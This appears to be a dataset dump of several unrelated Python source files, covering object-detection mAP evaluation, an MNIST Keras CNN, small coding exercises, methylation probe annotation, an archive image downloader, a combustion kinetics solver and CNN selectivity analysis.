sum_AP = 0.0
writer = open(output_file, 'w')
writer.write("# AP and precision/recall per class\n")
count_true_positives = {}
n_classes = len(gt_classes)
for class_index, class_name in enumerate(gt_classes):
count_true_positives[class_name] = 0
"""
Load detection-results of that class
Assign detection-results to ground-truth objects
"""
dr_data = class_bbox[class_name]
nd = len(dr_data)
tp = [0] * nd # creates an array of zeros of size nd
fp = [0] * nd
for idx, detection in enumerate(dr_data):
file_id = detection["file_id"]
ground_truth_data = labels[file_id]
ovmax = -1
gt_match = -1
# load detected object bounding-box
bb = [float(x) for x in detection["bbox"].split()]
for obj in ground_truth_data:
# look for a class_name match
if obj["class_name"] == class_name:
bbgt = [float(x) for x in obj["bbox"].split()]
bi = [max(bb[0], bbgt[0]), max(bb[1], bbgt[1]),
min(bb[2], bbgt[2]), min(bb[3], bbgt[3])]
iw = bi[2] - bi[0] + 1
ih = bi[3] - bi[1] + 1
if iw > 0 and ih > 0:
# compute overlap (IoU)
ua = (bb[2] - bb[0] + 1) * (bb[3] - bb[1] + 1) + \
(bbgt[2] - bbgt[0] + 1) * \
(bbgt[3] - bbgt[1] + 1) - iw * ih
ov = iw * ih / ua
if ov > ovmax:
ovmax = ov
gt_match = obj
# set minimum overlap
min_overlap = MINOVERLAP
if ovmax >= min_overlap:
if "difficult" not in gt_match:
if not bool(gt_match["used"]):
# true positive
tp[idx] = 1
gt_match["used"] = True
count_true_positives[class_name] += 1
else:
# false positive (multiple detection)
fp[idx] = 1
else:
# false positive
fp[idx] = 1
# compute precision / recall
ret = calculate_PR(sum_AP, fp, tp, counter_per_class, class_name)
sum_AP = ret['sum_AP']
text = ret['text']
prec = ret['prec']
rec = ret['rec']
print(text)
rounded_prec = ['%.2f' % elem for elem in prec]
rounded_rec = ['%.2f' % elem for elem in rec]
writer.write(text + "\n Precision: " + str(rounded_prec) +
"\n Recall :" + str(rounded_rec) + "\n\n")
writer.write("\n# mAP of all classes\n")
mAP = sum_AP / n_classes
text = "mAP = {0:.2f}%".format(mAP * 100)
writer.write(text + "\n")
print(text)
if __name__ == '__main__':
parser = argparse.ArgumentParser('mAP calculate')
parser.add_argument('-i', '--ignore', nargs='+', type=str,
help="ignore a list of classes.")
parser.add_argument('--label_path', default="./ground-truth", help='the path of the label files')
parser.add_argument('--npu_txt_path', default="./detection-results", help='the path of the predict result')
parser.add_argument('--output_file', default="./output.txt", help='save result file')
parser.add_argument('--threshold', default=0, help='threshold of the object score')
args = parser.parse_args()
args = check_args(args)
ret = get_label_list(args.label_path)
gt_file_bbox = ret['file_bbox']
gt_classes = ret['classes']
gt_n_classes = ret['n_classes']
counter_per_class = ret['counter_per_class']
class_bbox = get_predict_list(args.npu_txt_path, gt_classes)
calculate_AP(args.output_file, gt_classes, gt_file_bbox, class_bbox, counter_per_class)
| true |
c67ba94915ece9fd5c6c7928349629943b16797e | Python | Longfei-Zhao/ENGN4528 | /ENGN4528_codes/ENGN4528_CLAB4/4528_Clab4/mnist_cnn.py | UTF-8 | 4,211 | 2.546875 | 3 | [] | no_license | '''Trains a simple convnet on the MNIST dataset.
Gets to 99.25% test accuracy after 12 epochs
(there is still a lot of margin for parameter tuning).
16 seconds per epoch on a GRID K520 GPU.
'''
from __future__ import print_function
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.models import load_model
import numpy as np
#const
num_classes = 10
epochs = 60
pool_size = 2
train_patience = 6
model_name = 'cnn.h5'
save_data = 'adadelta.npz'
kernel_size = 3
batch_size = 150
lr = 0.1
hidden_layers = 128
Dropout_rate = 0.4
filter1 = 32
filter2 = 64
class LossHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.losses = {'batch':[], 'epoch':[]}
self.accuracy = {'batch':[], 'epoch':[]}
self.val_loss = {'batch':[], 'epoch':[]}
self.val_acc = {'batch':[], 'epoch':[]}
def on_batch_end(self, batch, logs={}):
self.losses['batch'].append(logs.get('loss'))
self.accuracy['batch'].append(logs.get('acc'))
self.val_loss['batch'].append(logs.get('val_loss'))
self.val_acc['batch'].append(logs.get('val_acc'))
def on_epoch_end(self, batch, logs={}):
self.losses['epoch'].append(logs.get('loss'))
self.accuracy['epoch'].append(logs.get('acc'))
self.val_loss['epoch'].append(logs.get('val_loss'))
self.val_acc['epoch'].append(logs.get('val_acc'))
def loss_save(self, file_name):
train_acc = np.array(self.accuracy['epoch'])
val_acc = np.array(self.val_acc['epoch'])
train_loss = np.array(self.losses['epoch'])
val_loss = np.array(self.val_loss['epoch'])
np.savez(file_name,train_acc = train_acc, train_loss = train_loss, val_acc = val_acc, val_loss = val_loss)
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
data_file = np.load('mnist.npz')
x_train, y_train, x_test, y_test = data_file['x_train'],data_file['y_train'],data_file['x_test'],data_file['y_test']
if K.image_data_format() == 'channels_first':
x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)
x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(filter1, kernel_size=(kernel_size, kernel_size),
activation='relu',
input_shape=input_shape))
model.add(Conv2D(filter2, (kernel_size, kernel_size), activation='relu'))
model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))
model.add(Dropout(Dropout_rate))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(Dropout_rate))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
history = LossHistory()
callbacks = [
EarlyStopping(monitor='val_loss', patience=train_patience, verbose=0),
ModelCheckpoint(model_name, monitor='val_loss', save_best_only=True, verbose=0),
history,
]
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_split = 0.2,
callbacks = callbacks)
model = load_model(model_name)
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
history.loss_save(save_data)
| true |
4cbf74972009ba2bd09861f655898cb9982640c5 | Python | kingbj940429/Coding_Test_Solution | /this_is_cote/4_2.py | UTF-8 | 446 | 3.6875 | 4 | [] | no_license | ''' 4-2 시각 '''
'''
접근
1) 시간에 만약 3이 있으면 break 걸고 cnt 증가
2) 분과 초는 0~59 까지임
'''
N = int(input())
cnt = 0
for i in range(N+1):
if(i%10 == 3):
cnt += 60*60
else:
for j in range(60):
if('3' in str(j)):
cnt += 60
else:
for k in range(60):
if('3' in str(k)):
cnt += 1
print(cnt)
| true |
ca5703545c79064f10daca80626b13268e25764c | Python | MuhammadAzizulHakim/Python-Codecademy_Solutions | /10. Advanced Topics in Python - b. Introduction to Bitwise Operators/4. Binary Representation - The bin() Function.py | UTF-8 | 197 | 2.765625 | 3 | [] | no_license | print bin(1)
print bin(2)
print bin(3)
print bin(4)
print bin(5)
print oct(1)
print oct(2)
print oct(3)
print oct(4)
print oct(5)
print hex(1)
print hex(2)
print hex(3)
print hex(4)
print hex(5)
| true |
ccc2453c83d62885d71e1beab2198487c735a0c3 | Python | chenyidao110/python | /day011/test01.py | UTF-8 | 499 | 3.609375 | 4 | [] | no_license | import random
f1 = 0
f2 = 0
f3 = 0
f4 = 0
f5 = 0
f6 = 0
for _ in range(6000):
face = random.randint(1,6)
if face == 1:
f1 += 1
elif face == 2:
f2 += 1
elif face == 3:
f3 += 1
elif face == 4:
f4 += 1
elif f5 == 5:
f5 += 1
else:
f6 += 1
print(f'1点出现了{f1}次')
print(f'2点出现了{f2}次')
print(f'3点出现了{f3}次')
print(f'4点出现了{f4}次')
print(f'5点出现了{f5}次')
print(f'6点出现了{f6}次') | true |
9e637fd56e07fc1213799cef83b4531727659413 | Python | atallah-lab/methylation | /python/methylator/annotation/annotate_450k_ORIGINAL.py | UTF-8 | 7,483 | 2.875 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
import os
class Probe:
"""
Holds Illumina 450k probe info for a single CpG site.
"""
def __init__(self):
self.id = None
self. seq = None
self.name = None
self.chr = None
self.cord = None
self.strand = None
self.gene = None
self.refseq = None
self.tour = None
self.loc = None
class Interval:
"""
Define a genomic interval by chromsome and strand orientation.
"""
def __init__(self, chromosome, start, end, strand):
self.chr = chromosome
self.start = start
self.end = end
self.strand = strand
class Location:
"""
Define a Probe location.
"""
BODY = "Body"
TSS200 = "TSS200"
TSS1500 = "TSS1500"
UTR5 = "5'UTR"
UTR3 = "3'UTR"
EXON = "Exon"
class CpG_location:
"""
Defines a CpG location.
"""
ISLAND = "Island"
NSHORE = "N_Shore"
SSHORE = "S_Shore"
NSHELF = "N_Shelf"
SSHELF = "S_Shelf"
class SNP:
"""
Defines the SNPs in probes. Used to filter probes.
"""
def __init__(self):
self.probeid = None
self.snpid = None
class Annotate_450k:
"""
Parse and hold information about Illumina probes.
"""
def __init__(self):
for i in open(anno_file, mode="r"):
self.ann = os.path.join("../../data/", i.strip("\n").strip("\r"))
self.probe = {}
self.__run__()
def __run__(self):
"""
A static function to setup the Probe classes.
"""
for i in open(self.ann, mode="r"):
if i.startswith("cg"):
data = i.split(",")
# Assign probe information.
new_probe = Probe()
new_probe.id = data[0]
new_probe.name = data[1]
new_probe.seq = data[13]
new_probe.chr = str(data[11])
new_probe.cord = int(data[12])
new_probe.strand = data[16]
new_probe.gene = data[21].split(";")
new_probe.refseq = data[22]
locs = data[23].split(";")
list_locs = []
for i in locs:
if i not in list_locs:
list_locs.append(i)
new_probe.loc = list_locs
new_probe.tour = data[25]
newcpg = {new_probe.id: new_probe}
self.probe.update(newcpg)
def get_probe(self, probe_id): #WORKS
"""
Return probe info associated with an reference.
"""
try:
probe = self.probe[probe_id]
except Exception as ex:
probe = None
print("WARNING: No probe with ref-id of %s found." % probe_id)
return probe
def get_all_probes(self):
"""
Return list of all probes.
"""
probe_list = []
for probe in self.probe.keys():
probe_list.append(self.get_probe(probe))
return probe_list
def get_probes_by_list(self, list_of_ids):
"""
Return a list of probes from a list of references.
"""
out_list = []
for probe_id in list_of_ids:
out_list.append(self.get_probe(probe_id))
return out_list
def get_probe_refs_by_gene(self, gene_name):
"""
Get all probe references associated with a gene.
"""
probes = {k: self.probe[k] for k in self.probe if gene_name in self.probe[k].gene}
return self.get_keys(probes.keys())
def get_probe_refs_by_location(self, probe_loc):
"""
Get all probe references associated with a genomic location.
"""
probes = {k: self.probe[k] for k in self.probe if probe_loc in self.probe[k].loc}
return self.get_keys(probes.keys())
def get_keys(self, dic_keys):
"""
Get Probe reference from probe dictionaries.
"""
l = []
for i in dic_keys:
l.append(i)
return l
def get_probes_by_gene(self, gene_name):
"""
Return list of probes for an associated gene.
"""
return self.get_probes_by_list(self.get_probe_refs_by_gene(gene_name))
def get_probes_by_location(self, loc):
"""
Return list of probes from genomic location.
"""
return self.get_probes_by_list(self.get_probe_refs_by_location(loc))
def get_probes_by_cpg(self, cpg_loc):
"""
Get a list probes from cpg location.
FIXME
"""
return self.get_probes_by_list(self.get_probes_by_cpg(cpg_loc))
def get_probes_by_chr(self, chr_loc):
"""
Get a list of probes within a certain genomic region
FIXME
"""
print (chr_loc.chr)
probes = {k: self.probe[k] for k in self.probe if
self.probe[k].chr == chr_loc.chr}
def get_probes_by_chr_and_loc(self, chr_loc):
"""
Get a list of probes within a certain genomic region
FIXME
"""
chrom = chr_loc.chr
start = int(chr_loc.start)
end = int(chr_loc.end)
#print (chrom, start, stop)
probes = {k: self.probe[k] for k in self.probe if
self.probe[k].chr == chrom and start < self.probe[k].cord < end}
return probes
def get_probe_keys_by_chr_and_loc(self, chr_loc):
"""
Get a list of probe reference *keys* within a genomic region
FIXME
"""
probes = self.get_probes_by_chr_and_loc(chr_loc)
return self.get_keys(probes)
def get_number(self):
"""
Return total number of probes.
"""
number = 0
for probe_id in self.probe.keys():
number += 1
return number
def get_coord(self, probe):
"""
Get genomic coordinate of a single probe.
"""
return probe.cord
def get_sorted_probes_by_id(self):
"""
Sort probes according to probe id.
"""
sorted_keys = sorted(list(self.probe.keys()))
return sorted_keys
def get_sorted_probes_by_chr(self):
"""
Sort probes according to probe id.
"""
return sorted(self.get_all_probes(), key=lambda x: x.chr)
def remove_snp_probes(self):
"""
Removes all SNPs associated with probes.
"""
snp_list = []
snp_file = open("../../data/humanmethylation450_dbsnp137.snpupdate.table.v2.sorted.txt", "r")
for line in snp_file:
if line.startswith("cg"):
line = line.strip("\n").strip("\r").split("\t")
new_snp = SNP()
new_snp.probeid = line[0]
new_snp.snpid = line[1]
snp_list.append(new_snp)
for snp in snp_list:
self.probe.pop(snp.probeid)
anno_file = os.path.abspath("../../data/config.ini") # Illumina probe manifest. Note: This (large) file is not
# in the repository.
# Functions to save/load dictionary objects.
import _pickle as pickle
def save_obj(obj, name):
with open('../../data/pickle/'+ name + '.pkl', 'wb+') as f:
pickle.dump(obj, f)
def load_obj(name):
with open('../../data/pickle/' + name + '.pkl', 'rb') as f:
return pickle.load(f)
| true |
9e08998912edee7f12d655b345d73a795fdb285a | Python | masyagin1998/robin | /src/dataset/stsl-download.py | UTF-8 | 2,933 | 2.828125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/python3
import argparse
import asyncio
import os
import time
from multiprocessing import (cpu_count)
from urllib.request import urlopen
import cv2
import numpy as np
async def save_img(link: str, path: str):
"""Get image via HTTP and save it asynchronously."""
cv2.imwrite(path, cv2.imdecode(np.asarray(bytearray(urlopen(link).read()), dtype='uint8'), cv2.IMREAD_COLOR))
async def save_imgs(link_path_pairs: [(str, str)]):
"""Get images via HTTP and save them asynchronously."""
await asyncio.wait([save_img(p[0], p[1]) for p in link_path_pairs])
def mkdir_s(path: str):
"""Create directory in specified path, if not exists."""
if not os.path.exists(path):
os.makedirs(path)
desc_str = r"""Download images from Trinity Lavra of St. Sergius - one of the most important Russian monastery.
Unfortunately, there are very few tagged data for binarizing document images, so sooner or later
you will want to create your own dataset. One of the best sources for data is the archive of
the Trinity-Sergius Lavra, because there are many old books in its archive, that answer the main
problems of the old documents. This script makes it easy to download books from there.
"""
def parse_args():
"""Get command line arguments."""
parser = argparse.ArgumentParser(prog='stsl-download',
formatter_class=argparse.RawDescriptionHelpFormatter,
description=desc_str)
parser.add_argument('-v', '--version', action='version', version='%(prog)s v0.1')
parser.add_argument('-l', '--link', type=str, default='',
help=r'part of link to book (for example: "http://old.stsl.ru/files/manuscripts/oldprint/1600-IV-1026/1026-").')
parser.add_argument('-b', '--begin', type=int, default=0,
help=r'beginning number (default: %(default)s)')
parser.add_argument('-e', '--end', type=int, default=0,
help=r'ending number (default: %(default)s)')
parser.add_argument('-o', '--output', type=str, default=os.path.join('.', 'output'),
help=r'directory for output train and ground-truth images suitable for U-net (default: "%(default)s")')
return parser.parse_args()
def main():
start_time = time.time()
args = parse_args()
if args.link == '':
print('no link specified, stopping program')
else:
mkdir_s(args.output)
links = [((args.link + '{0:04d}.jpg').format(i),
os.path.join(args.output, str(i) + '_in.png'))
for i in range(args.begin, args.end + 1)]
event_loop = asyncio.get_event_loop()
try:
event_loop.run_until_complete(save_imgs(links))
finally:
event_loop.close()
print('finished in {0:.2f} seconds'.format(time.time() - start_time))
if __name__ == '__main__':
main()
| true |
84204ae869e84cc7036bbe8f2707fb39ca18f01a | Python | Alex-Muirhead/AERO4450_MAP1 | /code/combustionSolver.py | UTF-8 | 4,342 | 2.71875 | 3 | [] | no_license | import math
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from scipy import integrate
from scipy import interpolate
Ru = 8.314 # kJ/kmol.K
pRef = 100 # kPa
plt.style.use("PaperDoubleFig.mplstyle")
def lin(lower, upper, deltaX):
deltaY = upper - lower
grad = deltaY / deltaX
def inner(x):
return lower + grad*x
return inner
def vectorInterface(lengths):
L = [0, *np.cumsum(lengths)]
def wrapper(func):
def inner(t, args):
splitArgs = [args[l:r] for l, r in zip(L[:-1], L[1:])]
output = func(t, *splitArgs)
return np.hstack([*output])
return inner
return wrapper
# (row) species 0 :: C2H4
# 1 :: O2
# 2 :: CO
# 3 :: H2O
# 4 :: CO2
# (col) reaction 0 :: C2H4 + 2 O2 --> 2 CO + 2 H2O
# 1 :: CO + 1/2 O2 <-> CO2
# Stoichiometric coefficients
ν = np.array([
[-1., 0. ],
[-2., -0.5],
[ 2., -1. ],
[ 2., 0. ],
[ 0., 1. ]
]).T
# Experimental partial powers
νExp = np.array([
[0.5 , 0. ],
[0.65, 0.5],
[2. , 1. ],
[2. , 0. ],
[0. , 1. ]
]).T
# Forward and reverse masks
maskF = np.zeros_like(ν, dtype=bool)
maskR = np.zeros_like(ν, dtype=bool)
maskF[ν < 0.] = True
maskR[ν > 0.] = True
chemData = []
for species in ("C2H4", "O2", "CO", "H2O", "CO2"):
data = pd.read_csv(f"chemData/{species}.txt", sep="\t", skiprows=1)
chemData.append(data[1:]) # Skip T=0K
logKfuncs, deltaHfuncs = [], []
for data in chemData:
T = data["T(K)"].values.astype(float)
logKf = data["log Kf"].values.astype(float)
deltaH = data["delta-f H"].values.astype(float) * 1e+03 # kJ/mol->kJ/kmol
logKfuncs.append(interpolate.interp1d(T, logKf, kind="quadratic"))
deltaHfuncs.append(interpolate.interp1d(T, deltaH, kind="quadratic"))
def Kc(T, p):
"""Kc = Kp * pow(pRef/Ru*T, νExp+...)"""
# NOTE: Account for partial pressures
Kf_i = np.array([pow(10, Kf(T)) for Kf in logKfuncs]) * (pRef/(Ru*T))
forward = pow(Kf_i, maskF*νExp)
reverse = pow(Kf_i, maskR*νExp)
return np.prod(reverse, axis=1) / np.prod(forward, axis=1)
def arrhenius(T):
return np.array([
1.739e+09 * math.exp(-1.485e+05 / (Ru*T)),
6.324e+07 * math.exp(-5.021e+04 / (Ru*T))
])
ΔT = 0.1e-03
temp = lin(1400, 2800, ΔT) # K
pres = lin(70, 140, ΔT) # kPa
@vectorInterface((5, 1))
def gradient(t, χ, h):
limit = (χ < 0)
χ[limit] = 0
# Would normally calculate T from h = \int cp(T) dT
T , p = temp(t), pres(t)
kf = arrhenius(T)
kr = kf / Kc(T, p)
kr[0] = 0 # One way reaction
forward = kf * np.prod(pow(χ, maskF*νExp), axis=1)
reverse = kr * np.prod(pow(χ, maskR*νExp), axis=1)
χGrad = ν.T @ forward - ν.T @ reverse
χGrad[(χGrad < 0)*limit] = 0
hGrad = -sum([dχ_i*h_i(T) for dχ_i, h_i in zip(χGrad, deltaHfuncs)])
return χGrad, hGrad
n = 1 + 3*(1 + 3.76)
χ0 = np.array(
[1/n, 3/n, 0.0, 0.0, 0.0]
) * 70 / (Ru * 1400)
sol = integrate.solve_ivp(
gradient, (0, ΔT), np.append(χ0, 0.),
method="LSODA", events=None,
atol=1e-10, rtol=1e-10
)
t, y = sol.t, sol.y
print(f"The heat released is {y[-1][-1]*1e-03:.3f} MJ/m^3")
print(np.array([1/n, 3/n, 0.0, 0.0, 0.0]))
fig, ax = plt.subplots()
formula = ("C$_2$H$_4$", "O$_2$", "CO", "H$_2$O", "CO$_2$")
[ax.plot(t*1e+06, y[i]*1e+03, label=formula[i]) for i in range(5)]
ax.legend()
ax.set_xlim([0, 100])
plt.xlabel(r"Time [$\mu$s]")
plt.ylabel("Concentration [mol/m$^3$]")
plt.title("Concentration of species over combustion")
plt.savefig("../images/concentration.pdf")
fig, ax = plt.subplots()
ax.plot(sol.t*1e+06, sol.y[-1]*1e-03, "k-", label="Net heat")
ax.legend()
ax.set_xlim([0, 100])
ax.set_ylim([0, 0.5])
plt.xlabel(r"Time [$\mu$s]")
plt.ylabel("Net heat [MJ/m$^3$]")
plt.title("Net heat release from combustion")
plt.savefig("../images/netHeat.pdf")
fig, ax = plt.subplots()
ax.plot(
sol.t*1e+06,
np.gradient(sol.y[-1], sol.t)*1e-06,
"k-", label="Heat rate"
)
ax.legend()
ax.set_xlim([0, 100])
ax.set_ylim([-5, 15])
plt.xlabel(r"Time [$\mu$s]")
plt.ylabel("Rate of heat [GW/m$^3$]")
plt.title("Rate of heat of combustion")
plt.savefig("../images/heatRate.pdf")
plt.show()
| true |
94a4340451170e345774112b46b8d31d7ad4df13 | Python | DeonC/rock-paper-scissors | /rps.py | UTF-8 | 1,064 | 3.90625 | 4 | [] | no_license | p1_score: int = 0
cpu_score: int = 0
def game():
from random import randint
wins = "You won! \n"
lose = " You loose! \n"
global p1_score
global cpu_score
ai = randint(0, 2)
if ai == 0:
ai = "Rock"
elif ai == 1:
ai = "Paper"
else:
ai = "Scissor"
# 0 = rock, 1 = paper, 2 = scissor
p1 = input("Make your move:")
p1 = p1.title()
if p1 == "Rock" and ai == "Scissor":
print(wins)
if wins:
p1_score += 1
print(f"User: {p1_score} CPU: {cpu_score}")
elif p1 == "Paper" and ai == "Rock":
print(wins)
if wins:
p1_score += 1
print(f"User: {p1_score} CPU: {cpu_score}")
elif p1 == "Scissor" and ai == "Paper":
print(wins)
if wins:
p1_score += 1
print(f"User: {p1_score} CPU: {cpu_score}")
elif p1 == ai:
print("Draw")
else:
cpu_score += 1
print(ai + "," + lose)
print(f"User: {p1_score} CPU: {cpu_score}")
game()
game()
| true |
bfe07c203c8e06b0896962b18edab897daad8aa7 | Python | bptripp/it-cnn | /tuning/selectivity.py | UTF-8 | 13,967 | 2.671875 | 3 | [
"MIT"
] | permissive | __author__ = 'bptripp'
from cnn_stimuli import get_image_file_list
import cPickle as pickle
import time
import numpy as np
import matplotlib.pyplot as plt
from alexnet import preprocess, load_net, load_vgg
def excess_kurtosis(columns):
m = np.mean(columns, axis=0)
sd = np.std(columns, axis=0)
result = np.zeros(columns.shape[1])
for i in range(columns.shape[1]):
column = columns[:,i]
d = column - m[i]
result[i] = np.sum(d**4) / columns.shape[0] / sd[i]**4 - 3
return result
# Copying these two functions from Salman's repo,
# ObjectSelectivity/sparseness.py and ObjectSelectivity/kurtosis_selectivity_profile.py
def calculate_kurtosis(rates_per_object):
"""
Given an array of firing rates of the neuron to objects, return the sparseness metric
Kurtosis (actually excess kurtosis) of the neuron as defined in:
[1] Lehky, S. R., Kiani, R., Esteky, H., & Tanaka, K. (2011). Statistics of
visual responses in primate inferotemporal cortex to object stimuli.
Journal of Neurophysiology, 106(3), 1097-117.
Kurtosis = (sum (Ri - Rmean)**4 / (n*sigma**4)) - 3
:param rates_per_object: array of firing rates of the neuron to multiple objects.
:return: kurtosis sparseness.
This is defined outside the class as it is used by other selectivity profiles.
"""
n = np.float(rates_per_object.shape[0])
rates_mean = np.mean(rates_per_object)
rates_sigma = np.std(rates_per_object)
kurtosis = np.sum((rates_per_object - rates_mean)**4) / (n * rates_sigma**4) - 3
# kurtosis2= np.sum((rates_per_object - rates_mean)**4) / n \
# / (np.sum((rates_per_object - rates_mean)**2) / n)** 2 - 3
return kurtosis
def activity_fraction(rates_per_object):
R = rates_per_object
n = len(rates_per_object)
return n/(n-1) * ( 1 - np.sum(R/n)**2 / np.sum(R**2/n) )
# num = 1 - (np.sum(R)/n)**2 / np.sum(R**2)/n
# den = 1 - 1/n
# return num / den
def plot_selectivity_and_sparseness(r_mat, font_size=10):
# plt.figure(figsize=)
# fig = plt.figure()
# print(fig.get_size_inches())
# f, ax_arr = plt.subplots(2, 1, sharex=True, figsize=(3.5,5))
f, ax_arr = plt.subplots(2, 1, sharex=False, figsize=(3,5))
# Single Neuron selectivities
n_neurons = r_mat.shape[0]
n_objs = r_mat.shape[1]
selectivities = np.zeros(n_neurons)
sparsenesses = np.zeros(n_objs)
for n_idx in np.arange(n_neurons):
rates = r_mat[n_idx, :]
selectivities[n_idx] = calculate_kurtosis(rates)
for o_idx in np.arange(n_objs):
rates = r_mat[:, o_idx]
sparsenesses[o_idx] = calculate_kurtosis(rates)
print(np.mean(selectivities))
print(np.mean(sparsenesses))
print('min selectivity: ' + str(np.min(selectivities)))
print('max selectivity: ' + str(np.max(selectivities)))
# Plot selectivities ------------------------------------------------
ax_arr[0].hist(np.clip(selectivities, -10, 25), bins=np.arange(-5, 850, step=1), color='red')
ax_arr[0].set_ylabel('frequency', fontsize=font_size)
ax_arr[0].set_xlabel('kurtosis', fontsize=font_size)
ax_arr[0].tick_params(axis='x', labelsize=font_size)
ax_arr[0].tick_params(axis='y', labelsize=font_size)
# ax_arr[0].set_xlim([0.1, 850])
ax_arr[0].annotate('mean=%0.2f' % np.mean(selectivities),
xy=(0.55, 0.98),
xycoords='axes fraction',
fontsize=font_size,
horizontalalignment='left',
verticalalignment='top')
ax_arr[0].annotate('med.=%0.2f' % np.median(selectivities),
xy=(0.55, 0.88),
xycoords='axes fraction',
fontsize=font_size,
horizontalalignment='left',
verticalalignment='top')
ax_arr[0].annotate('n=%d' % len(selectivities),
xy=(0.55, 0.78),
xycoords='axes fraction',
fontsize=font_size,
horizontalalignment='left',
verticalalignment='top')
ax_arr[0].annotate('single-neuron',
xy=(0.01, 0.98),
xycoords='axes fraction',
fontsize=font_size,
horizontalalignment='left',
verticalalignment='top')
# ax_arr[0].set_ylim([0, 40])
# ax_arr[0].set_xlim([0, 200])
# ax_arr[0].set_ylim([0, 130])
# ax_arr[0].set_xscale('log')
# Plot sparsenesses ------------------------------------------------
ax_arr[1].hist(np.clip(sparsenesses, -10, 60), bins=np.arange(-5, 850, step=3))
ax_arr[1].set_ylabel('frequency', fontsize=font_size)
ax_arr[1].set_xlabel('kurtosis', fontsize=font_size)
ax_arr[1].tick_params(axis='x', labelsize=font_size)
ax_arr[1].tick_params(axis='y', labelsize=font_size)
ax_arr[1].annotate('mean=%0.2f' % np.mean(sparsenesses),
xy=(0.55, 0.98),
xycoords='axes fraction',
fontsize=font_size,
horizontalalignment='left',
verticalalignment='top')
ax_arr[1].annotate('med.=%0.2f' % np.median(sparsenesses),
xy=(0.55, 0.88),
xycoords='axes fraction',
fontsize=font_size,
horizontalalignment='left',
verticalalignment='top')
ax_arr[1].annotate('n=%d' % len(sparsenesses),
xy=(0.55, 0.78),
xycoords='axes fraction',
fontsize=font_size,
horizontalalignment='left',
verticalalignment='top')
ax_arr[1].annotate('population',
xy=(0.01, 0.98),
xycoords='axes fraction',
fontsize=font_size,
horizontalalignment='left',
verticalalignment='top')
ax_arr[0].set_xlim([-2, 26])
ax_arr[1].set_xlim([-2, 62])
# ax_arr[1].set_ylim([0, 300])
plt.tight_layout()
# ax_arr[1].set_xscale('log')
if False:
with open('face-preference-alexnet-0.pkl', 'rb') as file:
alexnet0 = pickle.load(file)
with open('face-preference-alexnet-1.pkl', 'rb') as file:
alexnet1 = pickle.load(file)
with open('face-preference-alexnet-2.pkl', 'rb') as file:
alexnet2 = pickle.load(file)
with open('face-preference-vgg-0.pkl', 'rb') as file:
vgg0 = pickle.load(file)
with open('face-preference-vgg-1.pkl', 'rb') as file:
vgg1 = pickle.load(file)
with open('face-preference-vgg-2.pkl', 'rb') as file:
vgg2 = pickle.load(file)
edges = np.linspace(-5, 5, 21)
plt.figure(figsize=(8,4.5))
plt.subplot(2,3,1)
plt.hist(alexnet2, edges)
plt.ylabel('AlexNet Unit Count', fontsize=16)
plt.title('output-2', fontsize=16)
plt.subplot(2,3,2)
plt.hist(alexnet1, edges)
plt.title('output-1', fontsize=16)
plt.subplot(2,3,3)
plt.hist(alexnet0, edges)
plt.title('output', fontsize=16)
plt.subplot(2,3,4)
plt.hist(vgg2, edges, color='g')
plt.ylabel('VGG Unit Count', fontsize=16)
plt.subplot(2,3,5)
plt.hist(vgg1, edges, color='g')
plt.xlabel('Preference for Face Images', fontsize=16)
plt.subplot(2,3,6)
plt.hist(vgg0, edges, color='g')
plt.tight_layout(pad=0.05)
plt.savefig('../figures/selectivity-faces.eps')
plt.show()
if False:
use_vgg = True
remove_level = 2
if use_vgg:
model = load_vgg(weights_path='../weights/vgg16_weights.h5', remove_level=remove_level)
else:
model = load_net(weights_path='../weights/alexnet_weights.h5', remove_level=remove_level)
image_files = get_image_file_list('./images/lehky-processed/', 'png', with_path=True)
im = preprocess(image_files, use_vgg=use_vgg)
print(image_files)
mainly_faces = [197]
mainly_faces.extend(range(170, 178))
mainly_faces.extend(range(181, 196))
mainly_faces.extend(range(203, 214))
mainly_faces.extend(range(216, 224))
faces_major = [141, 142, 165, 169, 179, 196, 214, 215, 271]
faces_major.extend(range(144, 147))
faces_major.extend(range(157, 159))
faces_present = [131, 143, 178, 180, 198, 230, 233, 234, 305, 306, 316, 372, 470]
faces_present.extend(range(134, 141))
faces_present.extend(range(147, 150))
faces_present.extend(range(155, 157))
faces_present.extend(range(161, 165))
faces_present.extend(range(365, 369))
faces_present.extend(faces_major)
faces_present.extend(mainly_faces)
faces_ind = []
for i in range(len(image_files)):
for j in range(len(mainly_faces)):
if str(mainly_faces[j]) + '.' in image_files[i]:
faces_ind.append(i)
no_faces_ind = []
for i in range(len(image_files)):
has_face = False
for j in range(len(faces_present)):
if str(faces_present[j]) + '.' in image_files[i]:
has_face = True
if not has_face:
no_faces_ind.append(i)
# print(faces_ind)
# print(no_faces_ind)
start_time = time.time()
out = model.predict(im)
print(out.shape)
f = out[faces_ind,:]
nf = out[no_faces_ind,:]
print(f.shape)
print(nf.shape)
